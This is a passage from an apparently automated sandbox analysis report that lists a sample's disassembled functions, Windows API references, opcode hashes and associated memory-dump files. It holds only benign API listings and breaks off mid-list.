                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 95120c365ff79875e324a8eb56fdc2b23e8154efeeecb74392ea9a83615d1219
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 95120c365ff79875e324a8eb56fdc2b23e8154efeeecb74392ea9a83615d1219
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004EDACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 857d57a6dbf571ec83da500d40793bf902b1fc9fcc73a1f91632b1728cb6b97a
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 857d57a6dbf571ec83da500d40793bf902b1fc9fcc73a1f91632b1728cb6b97a
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                Function 004EDAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5899f566588cce89a738ae4f49e18f82b1e96a78334e80fc80428ee0722cd8f6
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 5899f566588cce89a738ae4f49e18f82b1e96a78334e80fc80428ee0722cd8f6
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                Function 004EDAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1ee75345a5b9808e8b425000260731acbefd63f80b8d8b1f116b6b111025ab80
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 1ee75345a5b9808e8b425000260731acbefd63f80b8d8b1f116b6b111025ab80
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                Function 004EDAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a0e25668980cc1b383039bd99178860fc0364de9c160d668c34729116ffef46f
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: a0e25668980cc1b383039bd99178860fc0364de9c160d668c34729116ffef46f
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                Function 004EDAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0f16c1dfc6e637748ad993b4420afbe3061d53ad83d1ec147947d43335dd9d3f
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 0f16c1dfc6e637748ad993b4420afbe3061d53ad83d1ec147947d43335dd9d3f
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                Function 004EDAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 62b135882e67d4c10c7638bc8b63fb1b545bfe7d0b579e21fe8194410af64f8b
                • Instruction ID: 534a1ef8a90ce6d9a7ca70d5dc25f7f13fda39e0d28d00e1bc318ffc9e68639e
                • Opcode Fuzzy Hash: 62b135882e67d4c10c7638bc8b63fb1b545bfe7d0b579e21fe8194410af64f8b
                • Instruction Fuzzy Hash: B3A01292A6C0413C3008B503AC02D3E020CD2C0B13330411FF0069008454480C050439
                Function 004EDBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 496ed705a31a92c48c2dbc86bcc755eaba3ee70a4c8394e06e63f9821fa6767e
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: 496ed705a31a92c48c2dbc86bcc755eaba3ee70a4c8394e06e63f9821fa6767e
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                Function 004EDC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 53db0e8075fa8f951cc70bfeee5888142197d1cb365ed3b7ad2bed2ba322efee
                • Instruction ID: 8cc22a950654db6fe7a61b433ed81b059fba2a0660b34d9938567f1b677f7f49
                • Opcode Fuzzy Hash: 53db0e8075fa8f951cc70bfeee5888142197d1cb365ed3b7ad2bed2ba322efee
                • Instruction Fuzzy Hash: 15A01295D6C1427C300C61036C02C3E021CC2C0B92330480FB006900C055841C054039
                Function 004EDC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e29fcdc737941dc90b06a856a548f3f08faf30c3d28d32aa25c975e6034a0b33
                • Instruction ID: 8cc22a950654db6fe7a61b433ed81b059fba2a0660b34d9938567f1b677f7f49
                • Opcode Fuzzy Hash: e29fcdc737941dc90b06a856a548f3f08faf30c3d28d32aa25c975e6034a0b33
                • Instruction Fuzzy Hash: 15A01295D6C1427C300C61036C02C3E021CC2C0B92330480FB006900C055841C054039
                Function 004EDC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fc44a6091f1961fa8ce1a01db84987c3d07252fe4382d63b742f1e736d116f04
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: fc44a6091f1961fa8ce1a01db84987c3d07252fe4382d63b742f1e736d116f04
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                Function 004EDC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7865a5c0e5c51fd17ec3a129bfb532d9ec45d0dd09004ce5c2884cc594bb0fb3
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: 7865a5c0e5c51fd17ec3a129bfb532d9ec45d0dd09004ce5c2884cc594bb0fb3
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                Function 004EDC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 96ddd0d4f9076d06dfc1735eb25c35b8c2428ebc7eda75f6396a2645ee349375
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: 96ddd0d4f9076d06dfc1735eb25c35b8c2428ebc7eda75f6396a2645ee349375
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                Function 004EA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,004EA587,C:\Users\user\Desktop,00000000,0051946A,00000006), ref: 004EA326
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: 8b8601366f71557eef7abc591181de10b6bc3f149f351732e51a61528e0577ac
                • Instruction ID: 5fa8e120e4ac60fe1dfd5a70adbb2ff814dc9f2e5a731720e9e268f96e064b2e
                • Opcode Fuzzy Hash: 8b8601366f71557eef7abc591181de10b6bc3f149f351732e51a61528e0577ac
                • Instruction Fuzzy Hash: ECA0123019400656CB100B30CC09C1976545770702F0086207002C00A0CB308818F500
                Function 004D96D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNELBASE(000000FF,?,?,004D968F,?,?,?,?,00501FA1,000000FF), ref: 004D96EB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: e99c080cb08c16cdfd6db9c50d9e64d4d21d0ce20c4a59138557a7e750e88d95
                • Instruction ID: e591439a62cf4d0d589a3a7a5f0d4d3502c116ba3c2ffae6a0d3d739ea90fedd
                • Opcode Fuzzy Hash: e99c080cb08c16cdfd6db9c50d9e64d4d21d0ce20c4a59138557a7e750e88d95
                • Instruction Fuzzy Hash: 5DF05E30556B048FDB308E24D5A9793B7E8AB12725F049B1F90EB937E0D769A88D9B04

                Non-executed Functions

                Function 004EB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004EB971
                • EndDialog.USER32(?,00000006), ref: 004EB984
                • GetDlgItem.USER32(?,0000006C), ref: 004EB9A0
                • SetFocus.USER32(00000000), ref: 004EB9A7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 004EB9E1
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004EBA18
                • FindFirstFileW.KERNEL32(?,?), ref: 004EBA2E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004EBA4C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004EBA5C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004EBA78
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004EBA94
                • _swprintf.LIBCMT ref: 004EBAC4
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004EBAD7
                • FindClose.KERNEL32(00000000), ref: 004EBADE
                • _swprintf.LIBCMT ref: 004EBB37
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 004EBB4A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004EBB67
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 004EBB87
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004EBB97
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004EBBB1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004EBBC9
                • _swprintf.LIBCMT ref: 004EBBF5
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004EBC08
                • _swprintf.LIBCMT ref: 004EBC5C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 004EBC6F
                  • Part of subcall function 004EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004EA662
                  • Part of subcall function 004EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0050E600,?,?), ref: 004EA6B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
